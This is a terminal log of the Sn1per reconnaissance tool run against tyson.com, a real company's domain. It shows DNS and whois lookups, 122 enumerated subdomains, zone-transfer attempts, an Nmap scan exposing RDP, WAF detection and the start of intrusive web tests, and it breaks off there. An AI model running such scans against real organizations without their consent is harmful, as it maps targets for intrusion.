root@kali:~# cd /usr/shared/sniperbash: cd: /usr/shared/sniper: No such file o

1. root@kali:~# cd /usr/shared/sniper
2. bash: cd: /usr/shared/sniper: No such file or directory
3. root@kali:~# cd /user/share/sniper
4. bash: cd: /user/share/sniper: No such file or directory
5. root@kali:~# cd /usr/share/sniper
6. root@kali:/usr/share/sniper# sniper tyson.com
7. ____
8. _________ / _/___ ___ _____
9. / ___/ __ \ / // __ \/ _ \/ ___/
10. (__ ) / / // // /_/ / __/ /
11. /____/_/ /_/___/ .___/\___/_/
12. /_/
13.  
14. + -- --=[http://crowdshield.com
15. + -- --=[sniper v2.4 by 1N3
16.  
17. + -- ----------------------------=[Running Nslookup]=------------------------ -- +
18. Server: 10.110.182.1
19. Address: 10.110.182.1#53
20.  
21. Non-authoritative answer:
22. Name: tyson.com
23. Address: 65.52.220.144
24.  
25. tyson.com has address 65.52.220.144
26. tyson.com mail is handled by 10 pps1.tyson.com.
27. tyson.com mail is handled by 10 pps3.tyson.com.
28. tyson.com mail is handled by 10 pps4.tyson.com.
29. tyson.com mail is handled by 10 pps5.tyson.com.
30. tyson.com mail is handled by 10 pps6.tyson.com.
31. tyson.com mail is handled by 10 pps2.tyson.com.
32. + -- ----------------------------=[Checking OS Fingerprint]=----------------- -- +
33.  
34. Xprobe2 v.0.3 Copyright (c) 2002-2005 fyodor@o0o.nu, ofir@sys-security.com, meder@o0o.nu
35.  
36. [+] Target is tyson.com
37. [+] Loading modules.
38. [+] Following modules are loaded:
39. [x] [1] ping:icmp_ping - ICMP echo discovery module
40. [x] [2] ping:tcp_ping - TCP-based ping discovery module
41. [x] [3] ping:udp_ping - UDP-based ping discovery module
42. [x] [4] infogather:ttl_calc - TCP and UDP based TTL distance calculation
43. [x] [5] infogather:portscan - TCP and UDP PortScanner
44. [x] [6] fingerprint:icmp_echo - ICMP Echo request fingerprinting module
45. [x] [7] fingerprint:icmp_tstamp - ICMP Timestamp request fingerprinting module
46. [x] [8] fingerprint:icmp_amask - ICMP Address mask request fingerprinting module
47. [x] [9] fingerprint:icmp_port_unreach - ICMP port unreachable fingerprinting module
48. [x] [10] fingerprint:tcp_hshake - TCP Handshake fingerprinting module
49. [x] [11] fingerprint:tcp_rst - TCP RST fingerprinting module
50. [x] [12] fingerprint:smb - SMB fingerprinting module
51. [x] [13] fingerprint:snmp - SNMPv2c fingerprinting module
52. [+] 13 modules registered
53. [+] Initializing scan engine
54. [+] Running scan engine
55. [-] ping:tcp_ping module: no closed/open TCP ports known on 65.52.220.144. Module test failed
56. [-] ping:udp_ping module: no closed/open UDP ports known on 65.52.220.144. Module test failed
57. [-] No distance calculation. 65.52.220.144 appears to be dead or no ports known
58. [+] Host: 65.52.220.144 is down (Guess probability: 0%)
59. [+] Cleaning up scan engine
60. [+] Modules deinitialized
61. [+] Execution completed.
62. + -- ----------------------------=[Gathering Whois Info]=-------------------- -- +
63.  
64. Whois Server Version 2.0
65.  
66. Domain names in the .com and .net domains can now be registered
67. with many different competing registrars. Go to http://www.internic.net
68. for detailed information.
69.  
70. Domain Name: TYSON.COM
71. Registrar: SAFENAMES LTD
72. Sponsoring Registrar IANA ID: 447
73. Whois Server: whois.safenames.net
74. Referral URL: http://www.safenames.net
75. Name Server: NS1.TYSON.COM
76. Name Server: NS2.TYSON.COM
77. Name Server: NS3.TYSON.COM
78. Name Server: NS4.TYSON.COM
79. Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
80. Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
81. Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
82. Updated Date: 17-may-2017
83. Creation Date: 31-may-1995
84. Expiration Date: 30-may-2023
85.  
86. >>> Last update of whois database: 2017-07-14T20:34:46Z <<<
87.  
88. For more information on Whois status codes, please visit https://icann.org/epp
89.  
90. NOTICE: The expiration date displayed in this record is the date the
91. registrar's sponsorship of the domain name registration in the registry is
92. currently set to expire. This date does not necessarily reflect the expiration
93. date of the domain name registrant's agreement with the sponsoring
94. registrar. Users may consult the sponsoring registrar's Whois database to
95. view the registrar's reported date of expiration for this registration.
96.  
97. TERMS OF USE: You are not authorized to access or query our Whois
98. database through the use of electronic processes that are high-volume and
99. automated except as reasonably necessary to register domain names or
100. modify existing registrations; the Data in VeriSign Global Registry
101. Services' ("VeriSign") Whois database is provided by VeriSign for
102. information purposes only, and to assist persons in obtaining information
103. about or related to a domain name registration record. VeriSign does not
104. guarantee its accuracy. By submitting a Whois query, you agree to abide
105. by the following terms of use: You agree that you may use this Data only
106. for lawful purposes and that under no circumstances will you use this Data
107. to: (1) allow, enable, or otherwise support the transmission of mass
108. unsolicited, commercial advertising or solicitations via e-mail, telephone,
109. or facsimile; or (2) enable high volume, automated, electronic processes
110. that apply to VeriSign (or its computer systems). The compilation,
111. repackaging, dissemination or other use of this Data is expressly
112. prohibited without the prior written consent of VeriSign. You agree not to
113. use electronic processes that are automated and high-volume to access or
114. query the Whois database except as reasonably necessary to register
115. domain names or modify existing registrations. VeriSign reserves the right
116. to restrict your access to the Whois database in its sole discretion to ensure
117. operational stability. VeriSign may restrict or terminate your access to the
118. Whois database for failure to abide by these terms of use. VeriSign
119. reserves the right to modify these terms at any time.
120.  
121. The Registry database contains ONLY .COM, .NET, .EDU domains and
122. Registrars.
123. Domain Name: TYSON.COM
124. Registry Domain ID: 2232321_DOMAIN_COM-VRSN
125. Registrar WHOIS Server: whois.safenames.net
126. Registrar URL: http://www.safenames.net
127. Updated Date: 2017-05-17T16:48:01Z
128. Creation Date: 1995-05-31T04:00:00Z
129. Registrar Registration Expiration Date: 2023-05-30T04:00:00Z
130. Registrar: Safenames Ltd
131. Registrar IANA ID: 447
132. Registrar Abuse Contact Email: abuse@safenames.net
133. Registrar Abuse Contact Phone: +44.1908200022
134. Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
135. Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
136. Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
137. Registry Registrant ID: Not Available From Registry
138. Registrant Name: Domain Admin
139. Registrant Organisation: Tyson Foods, Inc
140. Registrant Street: 2200 W Don Tyson Parkway
141. Registrant Street:
142. Registrant City: Springdale
143. Registrant State/Province: AR
144. Registrant Postal Code: 72761
145. Registrant Country: US
146. Registrant Phone: +1.8006433410
147. Registrant Fax:
148. Registrant Email: hostmaster@tyson.com
149. Registry Admin ID: Not Available From Registry
150. Admin Name: International Domain Administrator
151. Admin Organisation: Safenames Ltd
152. Admin Street: Safenames House, Sunrise Parkway
153. Admin Street:
154. Admin City: Milton Keynes
155. Admin State/Province: Bucks
156. Admin Postal Code: MK14 6LS
157. Admin Country: UK
158. Admin Phone: +44.1908200022
159. Admin Fax: +44.1908325192
160. Admin Email: hostmaster@safenames.net
161. Registry Tech ID: Not Available From Registry
162. Tech Name: International Domain Tech
163. Tech Organisation: International Domain Tech
164. Tech Street: Safenames House, Sunrise Parkway
165. Tech Street:
166. Tech City: Milton Keynes
167. Tech State/Province: Bucks
168. Tech Postal Code: MK14 6LS
169. Tech Country: UK
170. Tech Phone: +44.1908200022
171. Tech Fax: +44.1908325192
172. Tech Email: tec@safenames.net
173. Name Server: NS1.TYSON.COM
174. Name Server: NS2.TYSON.COM
175. Name Server: NS3.TYSON.COM
176. Name Server: NS4.TYSON.COM
177. DNSSEC: unsigned
178. URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
179. >>> Last update of WHOIS database: 2017-05-17T16:48:01Z <<<
180.  
181. "For more information on Whois status codes, please visit https://icann.org/epp"
182.  
183. Safenames - Experts in Global Domain Management and Online Brand Protection
184.  
185. Domain Registration in over 760 different extensions
186. Enterprise Domain Management since 1999
187. Mark Protect™ Online Brand Monitoring and Enforcement
188. Domain Consulting and Strategy
189. Domain Name Acquisition
190. Domain Disputes and Recovery
191.  
192. Visit Safenames at www.safenames.net
193. +1 703 574 5313 in the US/Canada
194. +44 1908 200022 in Europe
195.  
196. The Data in the Safenames Registrar WHOIS database is provided by Safenames for
197. information purposes only, and to assist persons in obtaining information about
198. or related to a domain name registration record. Safenames does not guarantee
199. its accuracy. Additionally, the data may not reflect updates to billing
200. contact information.
201.  
202. By submitting a WHOIS query, you agree to use this Data only for lawful purposes
203. and that under no circumstances will you use this Data to:
204.  
205. (1) allow, enable, or otherwise support the transmission of mass unsolicited,
206. commercial advertising or solicitations via e-mail, telephone, or facsimile; or
207. (2) enable high volume, automated, electronic processes that apply to Safenames
208. (or its computer systems). The compilation, repackaging, dissemination or
209. other use of this Data is expressly prohibited without the prior written
210. consent of Safenames. Safenames reserves the right to terminate your access to
211. the Safenames Registrar WHOIS database in its sole discretion, including
212. without limitation, for excessive querying of the WHOIS database or for failure
213. to otherwise abide by this policy. Safenames reserves the right to modify
214. these terms at any time. By submitting this query, you agree to abide by this
215. policy.
216.  
217.  
218. + -- ----------------------------=[Gathering OSINT Info]=-------------------- -- +
219.  
220. *******************************************************************
221. * *
222. * | |_| |__ ___ /\ /\__ _ _ ____ _____ ___| |_ ___ _ __ *
223. * | __| '_ \ / _ \ / /_/ / _` | '__\ \ / / _ \/ __| __/ _ \ '__| *
224. * | |_| | | | __/ / __ / (_| | | \ V / __/\__ \ || __/ | *
225. * \__|_| |_|\___| \/ /_/ \__,_|_| \_/ \___||___/\__\___|_| *
226. * *
227. * TheHarvester Ver. 2.7 *
228. * Coded by Christian Martorella *
229. * Edge-Security Research *
230. * cmartorella@edge-security.com *
231. *******************************************************************
232.  
233.  
234. [-] Searching in Bing:
235. Searching 50 results...
236. Searching 100 results...
237.  
238.  
239. [+] Emails found:
240. ------------------
241. No emails found
242.  
243. [+] Hosts found in search engines:
244. ------------------------------------
245. [-] Resolving hostnames IPs...
246. 69.172.200.241:ir.tyson.com
247. 65.52.220.144:projectaplus.tyson.com
248. 65.52.220.144:www.tyson.com
249. + -- ----------------------------=[Gathering DNS Info]=---------------------- -- +
250.  
251. ; <<>> DiG 9.10.3-P4-Debian <<>> -x tyson.com
252. ;; global options: +cmd
253. ;; Got answer:
254. ;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 37910
255. ;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1
256.  
257. ;; OPT PSEUDOSECTION:
258. ; EDNS: version: 0, flags:; udp: 4096
259. ;; QUESTION SECTION:
260. ;com.tyson.in-addr.arpa. IN PTR
261.  
262. ;; AUTHORITY SECTION:
263. in-addr.arpa. 3600 IN SOA b.in-addr-servers.arpa. nstld.iana.org. 2017042804 1800 900 604800 3600
264.  
265. ;; Query time: 62 msec
266. ;; SERVER: 10.110.182.1#53(10.110.182.1)
267. ;; WHEN: Fri Jul 14 16:36:18 EDT 2017
268. ;; MSG SIZE rcvd: 119
269.  
270. dnsenum.pl VERSION:1.2.3
271.  
272. ----- tyson.com -----
273.  
274.  
275. Host's addresses:
276. __________________
277.  
278. tyson.com. 803 IN A 65.52.220.144
279.  
280.  
281. Name Servers:
282. ______________
283.  
284. ns1.tyson.com. 172698 IN A 199.66.1.33
285. ns2.tyson.com. 172698 IN A 199.66.3.34
286. ns3.tyson.com. 172698 IN A 199.66.3.33
287. ns4.tyson.com. 172698 IN A 199.66.1.34
288.  
289.  
290. Mail (MX) Servers:
291. ___________________
292.  
293. pps2.tyson.com. 28800 IN A 199.66.1.102
294. pps2.tyson.com. 28800 IN A 199.66.3.102
295. pps3.tyson.com. 28800 IN A 199.66.1.103
296. pps3.tyson.com. 28800 IN A 199.66.3.103
297. pps4.tyson.com. 28800 IN A 199.66.1.104
298. pps4.tyson.com. 28800 IN A 199.66.3.104
299. pps1.tyson.com. 28800 IN A 199.66.1.101
300. pps1.tyson.com. 28800 IN A 199.66.3.101
301. pps6.tyson.com. 28800 IN A 199.66.3.111
302. pps6.tyson.com. 28800 IN A 199.66.1.111
303. pps5.tyson.com. 28800 IN A 199.66.3.110
304. pps5.tyson.com. 28800 IN A 199.66.1.110
305.  
306.  
307. Trying Zone Transfers and getting Bind Versions:
308. _________________________________________________
309.  
310.  
311. Trying Zone Transfer for tyson.com on ns4.tyson.com ...
312. AXFR record query failed: REFUSED
313.  
314. Trying Zone Transfer for tyson.com on ns1.tyson.com ...
315. AXFR record query failed: REFUSED
316.  
317. Trying Zone Transfer for tyson.com on ns3.tyson.com ...
318. AXFR record query failed: REFUSED
319.  
320. Trying Zone Transfer for tyson.com on ns2.tyson.com ...
321. AXFR record query failed: REFUSED
322.  
323. brute force file not specified, bay.
324. + -- ----------------------------=[Gathering DNS Subdomains]=---------------- -- +
325.  
326. ____ _ _ _ _ _____
327. / ___| _ _| |__ | (_)___| |_|___ / _ __
328. \___ \| | | | '_ \| | / __| __| |_ \| '__|
329. ___) | |_| | |_) | | \__ \ |_ ___) | |
330. |____/ \__,_|_.__/|_|_|___/\__|____/|_|
331.  
332. # Coded By Ahmed Aboul-Ela - @aboul3la
333.  
334. [-] Enumerating subdomains now for tyson.com
335. [-] verbosity is enabled, will show the subdomains results in realtime
336. [-] Searching now in Baidu..
337. [-] Searching now in Yahoo..
338. [-] Searching now in Google..
339. [-] Searching now in Bing..
340. [-] Searching now in Ask..
341. [-] Searching now in Netcraft..
342. [-] Searching now in DNSdumpster..
343. [-] Searching now in Virustotal..
344. [-] Searching now in ThreatCrowd..
345. [-] Searching now in SSL Certificates..
346. [-] Searching now in PassiveDNS..
347. Virustotal: is.tyson.com
348. Virustotal: talent.tyson.com
349. Virustotal: source.tyson.com
350. Virustotal: intranet.tyson.com
351. Virustotal: sts3a.tyson.com
352. Virustotal: hrweb.tyson.com
353. Virustotal: ns3.tyson.com
354. Virustotal: dialin.tyson.com
355. Virustotal: workflow.tyson.com
356. Virustotal: ucpool01-webext.tyson.com
357. Virustotal: tysonweb.tyson.com
358. Virustotal: pps5.tyson.com
359. Virustotal: myweb.tyson.com
360. Virustotal: mdseg.tyson.com
361. Virustotal: operweb.tyson.com
362. Virustotal: mobile.tyson.com
363. Virustotal: gdsn-images.tyson.com
364. Virustotal: finance.tyson.com
365. Virustotal: finweb.tyson.com
366. Virustotal: ediint2.tyson.com
367. Virustotal: ediint1.tyson.com
368. Virustotal: content-test.tyson.com
369. Virustotal: email.tyson.com
370. Virustotal: autodiscover.tyson.com
371. Virustotal: hss.tyson.com
372. Virustotal: is-test.tyson.com
373. Virustotal: sts3.tyson.com
374. Virustotal: pps6.tyson.com
375. Virustotal: www-stage.tyson.com
376. Virustotal: drdesktop.tyson.com
377. Virustotal: newsletter.tyson.com
378. Virustotal: isweb.tyson.com
379. Virustotal: content.tyson.com
380. Virustotal: expense.tyson.com
381. Virustotal: hungerrelief.tyson.com
382. Virustotal: m-projectaplus.tyson.com
383. Virustotal: sslvpn-test.tyson.com
384. Virustotal: source-test.tyson.com
385. Virustotal: ppo.tyson.com
386. Virustotal: broilerapp.tyson.com
387. Virustotal: creditapp.tyson.com
388. Virustotal: ss.tyson.com
389. Virustotal: pps4.tyson.com
390. Virustotal: pps3.tyson.com
391. Virustotal: pps1.tyson.com
392. Virustotal: securemail.tyson.com
393. Virustotal: pps2a.tyson.com
394. Virustotal: sip.tyson.com
395. Virustotal: tango.tyson.com
396. Virustotal: localgrainservices.tyson.com
397. Virustotal: pps2.tyson.com
398. Virustotal: meet.tyson.com
399. Virustotal: supplierportal.tyson.com
400. Virustotal: projectaplus.tyson.com
401. Virustotal: m.tyson.com
402. Virustotal: sites.tyson.com
403. Virustotal: smetrics.tyson.com
404. Virustotal: lyncdiscover.tyson.com
405. Virustotal: sslvpn.tyson.com
406. Virustotal: wwb03.tyson.com
407. Virustotal: dredir.tyson.com
408. Virustotal: udesign.tyson.com
409. Virustotal: meetingplace.tyson.com
410. Virustotal: ns04.tyson.com
411. Virustotal: ns02.tyson.com
412. Virustotal: ns01.tyson.com
413. Virustotal: ns03.tyson.com
414. Virustotal: wwb02.tyson.com
415. Virustotal: ir.tyson.com
416. Virustotal: www.tyson.com
417. Virustotal: metrics.tyson.com
418. ThreatCrowd: pps1.tyson.com
419. ThreatCrowd: pps2.tyson.com
420. ThreatCrowd: pps3.tyson.com
421. ThreatCrowd: pps4.tyson.com
422. ThreatCrowd: isweb.tyson.com
423. ThreatCrowd: m.tyson.com
424. ThreatCrowd: ir.tyson.com
425. ThreatCrowd: metrics.tyson.com
426. ThreatCrowd: projectaplus.tyson.com
427. ThreatCrowd: source-test.tyson.com
428. ThreatCrowd: www.tyson.com
429. SSL Certificates: source.tyson.com
430. SSL Certificates: freshmeats.tyson.com
431. SSL Certificates: isweb.tyson.com
432. SSL Certificates: awseg-qa.tyson.com
433. SSL Certificates: awmanage-qa.tyson.com
434. SSL Certificates: mdseg.tyson.com
435. SSL Certificates: sip.tyson.com
436. SSL Certificates: webconf.tyson.com
437. SSL Certificates: manage.tyson.com
438. SSL Certificates: activesync-test.tyson.com
439. SSL Certificates: autodiscover-test.tyson.com
440. SSL Certificates: email-test.tyson.com
441. SSL Certificates: mobile-test.tyson.com
442. SSL Certificates: creditapp.tyson.com
443. SSL Certificates: activate-test.tyson.com
444. SSL Certificates: manage-test.tyson.com
445. SSL Certificates: sslvpn-test.tyson.com
446. SSL Certificates: mobile.tyson.com
447. SSL Certificates: scep04.tyson.com
448. SSL Certificates: securemail.tyson.com
449. SSL Certificates: www.tyson.com
450. SSL Certificates: docs.tyson.com
451. SSL Certificates: activate.tyson.com
452. SSL Certificates: mdmanage.tyson.com
453. SSL Certificates: sslvpn.tyson.com
454. SSL Certificates: pps6.tyson.com
455. SSL Certificates: smetrics.tyson.com
456. SSL Certificates: pps3.tyson.com
457. SSL Certificates: pps2.tyson.com
458. SSL Certificates: pps4.tyson.com
459. SSL Certificates: pps1.tyson.com
460. SSL Certificates: localgrainservices.tyson.com
461. SSL Certificates: ss.tyson.com
462. SSL Certificates: dialin.tyson.com
463. SSL Certificates: lyncdiscover.tyson.com
464. SSL Certificates: meet.tyson.com
465. SSL Certificates: ucpool01-webext.tyson.com
466. SSL Certificates: ucwebapp01.tyson.com
467. SSL Certificates: enterpriseregistration.tyson.com
468. SSL Certificates: sts3.tyson.com
469. SSL Certificates: Lyncdiscover.tyson.com
470. SSL Certificates: lyncweb.tyson.com
471. SSL Certificates: activesync.tyson.com
472. SSL Certificates: autodiscover.tyson.com
473. SSL Certificates: email.tyson.com
474. SSL Certificates: partnerweb.tyson.com
475. PassiveDNS: Newer Sublist3r doesn't allow underscores in hostnames at places like tyson.com
476. PassiveDNS: From http://PTRarchive.com: timtest.tyson.com
477. PassiveDNS: From http://PTRarchive.com: vc.tyson.com
478. PassiveDNS: From http://PTRarchive.com: sslvpn-test.tyson.com
479. PassiveDNS: From http://PTRarchive.com: vnets.tyson.com
480. PassiveDNS: From http://PTRarchive.com: ginternet.tyson.com
481. PassiveDNS: From http://PTRarchive.com: www.tyson.com
482. Bing: hrweb.tyson.com
483. Bing: creditapp.tyson.com
484. Bing: dialin.tyson.com
485. Bing: drdesktop.tyson.com
486. Bing: expense.tyson.com
487. Bing: localgrainservices.tyson.com
488. Bing: ir.tyson.com
489. Bing: projectaplus.tyson.com
490. Bing: sts3.tyson.com
491. Bing: sslvpn.tyson.com
492. Bing: broilerapp.tyson.com
493. Bing: securemail.tyson.com
494. Bing: talent.tyson.com
495. Bing: ucpool01-webext.tyson.com
496. Bing: sts3a.tyson.com
497. Bing: positionstatements.tyson.com
498. Bing: hss.tyson.com
499. Bing: source-test.tyson.com
500. Bing: newsletter.tyson.com
501. Bing: meet.tyson.com
502. Bing: m.tyson.com
503. [!] Error: Google probably now is blocking our requests
504. [~] Finished now the Google Enumeration ...
505. DNSdumpster: creditapp.tyson.com
506. DNSdumpster: dredir.tyson.com
507. DNSdumpster: ediintqa.tyson.com
508. DNSdumpster: pps3.tyson.com
509. DNSdumpster: inttst1.tyson.com
510. DNSdumpster: pps6.tyson.com
511. DNSdumpster: email-test.tyson.com
512. DNSdumpster: mobile-test.tyson.com
513. Netcraft: www.tyson.com
514. DNSdumpster: mdseg.tyson.com
515. DNSdumpster: ediintpr.tyson.com
516. DNSdumpster: autodiscover.tyson.com
517. DNSdumpster: ftp.tyson.com
518. DNSdumpster: com01.tyson.com
519. DNSdumpster: meetings.tyson.com
520. DNSdumpster: ediinttest1.tyson.com
521. DNSdumpster: creditapp-test.tyson.com
522. DNSdumpster: officeweb.tyson.com
523. DNSdumpster: meet.tyson.com
524. DNSdumpster: neovpn.tyson.com
525. DNSdumpster: myweb.tyson.com
526. DNSdumpster: ns02.tyson.com
527. DNSdumpster: dmz04.tyson.com
528. DNSdumpster: lyncweb.tyson.com
529. DNSdumpster: partnerweb.tyson.com
530. DNSdumpster: corp.tyson.com
531. DNSdumpster: mdmanage-qa.tyson.com
532. DNSdumpster: localgrainservices.tyson.com
533. DNSdumpster: av.tyson.com
534. DNSdumpster: pps.tyson.com
535. DNSdumpster: email.tyson.com
536. DNSdumpster: ediint1.tyson.com
537. DNSdumpster: mdseg-qa.tyson.com
538. DNSdumpster: dl.tyson.com
539. DNSdumpster: mdmanage.tyson.com
540. DNSdumpster: activesync.tyson.com
541. DNSdumpster: pps5.tyson.com
542. DNSdumpster: manage-test.tyson.com
543. DNSdumpster: pps2.tyson.com
544. DNSdumpster: pps4.tyson.com
545. DNSdumpster: hod.tyson.com
546. DNSdumpster: dmzaix02.tyson.com
547. DNSdumpster: ns03.tyson.com
548. DNSdumpster: ma-asa.tyson.com
549. DNSdumpster: ns01.tyson.com
550. DNSdumpster: ginternet.tyson.com
551. DNSdumpster: cserv.tyson.com
552. DNSdumpster: mobile.tyson.com
553. DNSdumpster: lyncdiscover.tyson.com
554. DNSdumpster: pps1.tyson.com
555. DNSdumpster: ns04.tyson.com
556. [-] Saving results to file: /usr/share/sniper/loot/domains/domains-tyson.com.txt
557. [-] Total Unique Subdomains Found: 122
558. Newer Sublist3r doesn't allow underscores in hostnames at places like tyson.com
559. www.tyson.com
560. Lyncdiscover.tyson.com
561. activate.tyson.com
562. activate-test.tyson.com
563. activesync.tyson.com
564. activesync-test.tyson.com
565. autodiscover.tyson.com
566. autodiscover-test.tyson.com
567. av.tyson.com
568. awmanage-qa.tyson.com
569. awseg-qa.tyson.com
570. broilerapp.tyson.com
571. com01.tyson.com
572. From http://PTRarchive.com: ginternet.tyson.com
573. From http://PTRarchive.com: sslvpn-test.tyson.com
574. From http://PTRarchive.com: timtest.tyson.com
575. From http://PTRarchive.com: vc.tyson.com
576. From http://PTRarchive.com: vnets.tyson.com
577. From http://PTRarchive.com: www.tyson.com
578. content.tyson.com
579. content-test.tyson.com
580. corp.tyson.com
581. creditapp.tyson.com
582. creditapp-test.tyson.com
583. cserv.tyson.com
584. dialin.tyson.com
585. dl.tyson.com
586. dmz04.tyson.com
587. dmzaix02.tyson.com
588. docs.tyson.com
589. drdesktop.tyson.com
590. dredir.tyson.com
591. ediint1.tyson.com
592. ediint2.tyson.com
593. ediintpr.tyson.com
594. ediintqa.tyson.com
595. ediinttest1.tyson.com
596. email.tyson.com
597. email-test.tyson.com
598. enterpriseregistration.tyson.com
599. expense.tyson.com
600. finance.tyson.com
601. finweb.tyson.com
602. freshmeats.tyson.com
603. ftp.tyson.com
604. gdsn-images.tyson.com
605. ginternet.tyson.com
606. hod.tyson.com
607. hrweb.tyson.com
608. hss.tyson.com
609. hungerrelief.tyson.com
610. intranet.tyson.com
611. inttst1.tyson.com
612. ir.tyson.com
613. is.tyson.com
614. is-test.tyson.com
615. isweb.tyson.com
616. localgrainservices.tyson.com
617. lyncdiscover.tyson.com
618. lyncweb.tyson.com
619. m.tyson.com
620. m-projectaplus.tyson.com
621. ma-asa.tyson.com
622. manage.tyson.com
623. manage-test.tyson.com
624. mdmanage.tyson.com
625. mdmanage-qa.tyson.com
626. mdseg.tyson.com
627. mdseg-qa.tyson.com
628. meet.tyson.com
629. meetingplace.tyson.com
630. meetings.tyson.com
631. metrics.tyson.com
632. mobile.tyson.com
633. mobile-test.tyson.com
634. myweb.tyson.com
635. neovpn.tyson.com
636. newsletter.tyson.com
637. ns01.tyson.com
638. ns02.tyson.com
639. ns03.tyson.com
640. ns04.tyson.com
641. ns3.tyson.com
642. officeweb.tyson.com
643. operweb.tyson.com
644. partnerweb.tyson.com
645. positionstatements.tyson.com
646. ppo.tyson.com
647. pps.tyson.com
648. pps1.tyson.com
649. pps2.tyson.com
650. pps2a.tyson.com
651. pps3.tyson.com
652. pps4.tyson.com
653. pps5.tyson.com
654. pps6.tyson.com
655. projectaplus.tyson.com
656. scep04.tyson.com
657. securemail.tyson.com
658. sip.tyson.com
659. sites.tyson.com
660. smetrics.tyson.com
661. source.tyson.com
662. source-test.tyson.com
663. ss.tyson.com
664. sslvpn.tyson.com
665. sslvpn-test.tyson.com
666. sts3.tyson.com
667. sts3a.tyson.com
668. supplierportal.tyson.com
669. talent.tyson.com
670. tango.tyson.com
671. tysonweb.tyson.com
672. ucpool01-webext.tyson.com
673. ucwebapp01.tyson.com
674. udesign.tyson.com
675. webconf.tyson.com
676. workflow.tyson.com
677. wwb02.tyson.com
678. wwb03.tyson.com
679. www-stage.tyson.com
680.  
681. ╔═╗╦═╗╔╦╗╔═╗╦ ╦
682. ║ ╠╦╝ ║ ╚═╗╠═╣
683. ╚═╝╩╚═ ╩o╚═╝╩ ╩
684. + -- ----------------------------=[Gathering Certificate Subdomains]=-------- -- +
685.  
686. activate-test.tyson.com
687. activate.tyson.com
688. activesync-test.tyson.com
689. activesync.tyson.com
690. autodiscover-test.tyson.com
691. autodiscover.tyson.com
692. awmanage-qa.tyson.com
693. awseg-qa.tyson.com
694. creditapp.tyson.com
695. dialin.tyson.com
696. docs.tyson.com
697. email-test.tyson.com
698. email.tyson.com
699. enterpriseregistration.tyson.com
700. freshmeats.tyson.com
701. isweb.tyson.com
702. localgrainservices.tyson.com
703. lyncdiscover.tyson.com
704. Lyncdiscover.tyson.com
705. lyncweb.tyson.com
706. manage-test.tyson.com
707. manage.tyson.com
708. mdmanage.tyson.com
709. mdseg.tyson.com
710. meet.tyson.com
711. mobile-test.tyson.com
712. mobile.tyson.com
713. partnerweb.tyson.com
714. pps1.tyson.com
715. pps2.tyson.com
716. pps3.tyson.com
717. pps4.tyson.com
718. pps6.tyson.com
719. scep04.tyson.com
720. securemail.tyson.com
721. sip.tyson.com
722. smetrics.tyson.com
723. source.tyson.com
724. sslvpn-test.tyson.com
725. sslvpn.tyson.com
726. ss.tyson.com
727. sts3.tyson.com
728. ucpool01-webext.tyson.com
729. ucwebapp01.tyson.com
730. webconf.tyson.com
731. www.tyson.com
732. [+] Domains saved to: /usr/share/sniper/loot/domains/domains-tyson.com-full.txt
733.  
734. + -- ----------------------------=[Checking for Sub-Domain Hijacking]=------- -- +
735. ; <<>> DiG 9.10.3-P4-Debian <<>> drdesktop.tyson.com CNAME
736. ;drdesktop.tyson.com. IN CNAME
737. + -- ----------------------------=[Checking Email Security]=----------------- -- +
738.  
739. + -- ----------------------------=[Pinging host]=---------------------------- -- +
740. PING tyson.com (65.52.220.144) 56(84) bytes of data.
741.  
742. --- tyson.com ping statistics ---
743. 1 packets transmitted, 0 received, 100% packet loss, time 0ms
744.  
745.  
746. + -- ----------------------------=[Running TCP port scan]=------------------- -- +
747.  
748. Starting Nmap 7.40 ( https://nmap.org ) at 2017-07-14 16:41 EDT
749. Nmap scan report for tyson.com (65.52.220.144)
750. Host is up (0.066s latency).
751. Not shown: 42 filtered ports
752. Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
753. PORT STATE SERVICE
754. 80/tcp open http
755. 443/tcp open https
756. 3389/tcp open ms-wbt-server
757.  
758. Nmap done: 1 IP address (1 host up) scanned in 15.47 seconds
759.  
760. + -- ----------------------------=[Running Intrusive Scans]=----------------- -- +
761. + -- --=[Port 21 closed... skipping.
762. + -- --=[Port 22 closed... skipping.
763. + -- --=[Port 23 closed... skipping.
764. + -- --=[Port 25 closed... skipping.
765. + -- --=[Port 53 closed... skipping.
766. + -- --=[Port 79 closed... skipping.
767. + -- --=[Port 80 opened... running tests...
768. + -- ----------------------------=[Checking for WAF]=------------------------ -- +
769.  
770. ^ ^
771. _ __ _ ____ _ __ _ _ ____
772. ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
773. | V V // o // _/ | V V // 0 // 0 // _/
774. |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
775. <
776. ...'
777.  
778. WAFW00F - Web Application Firewall Detection Tool
779.  
780. By Sandro Gauci && Wendel G. Henrique
781.  
782. Checking http://tyson.com
783. Generic Detection results:
784. The site http://tyson.com seems to be behind a WAF or some sort of security solution
785. Reason: The server returned a different response code when a string trigged the blacklist.
786. Normal response code is "301", while the response code to an attack is "302"
787. Number of requests: 16
788.  
789. + -- ----------------------------=[Gathering HTTP Info]=--------------------- -- +
790. http://tyson.com [301 Moved Permanently] Country[UNITED STATES][US], HTTPServer[Microsoft-IIS/8.0], IP[65.52.220.144], Microsoft-IIS[8.0], RedirectLocation[http://www.tyson.com/], Title[Document Moved], X-Powered-By[ASP.NET]
791. http://www.tyson.com/ [200 OK] ASP_NET[4.0.30319][MVC5.1], Country[UNITED STATES][US], HTML5, HTTPServer[Microsoft-IIS/8.0], IP[65.52.220.144], JQuery, Microsoft-IIS[8.0], Script[text/javascript], Title[Tyson | Home], UncommonHeaders[x-aspnetmvc-version], X-Powered-By[ASP.NET], X-UA-Compatible[IE=edge]
792.  
793. __ ______ _____
794. \ \/ / ___|_ _|
795. \ /\___ \ | |
796. / \ ___) || |
797. /_/\_|____/ |_|
798.  
799. + -- --=[Cross-Site Tracer v1.3 by 1N3 @ CrowdShield
800. + -- --=[Target: tyson.com:80
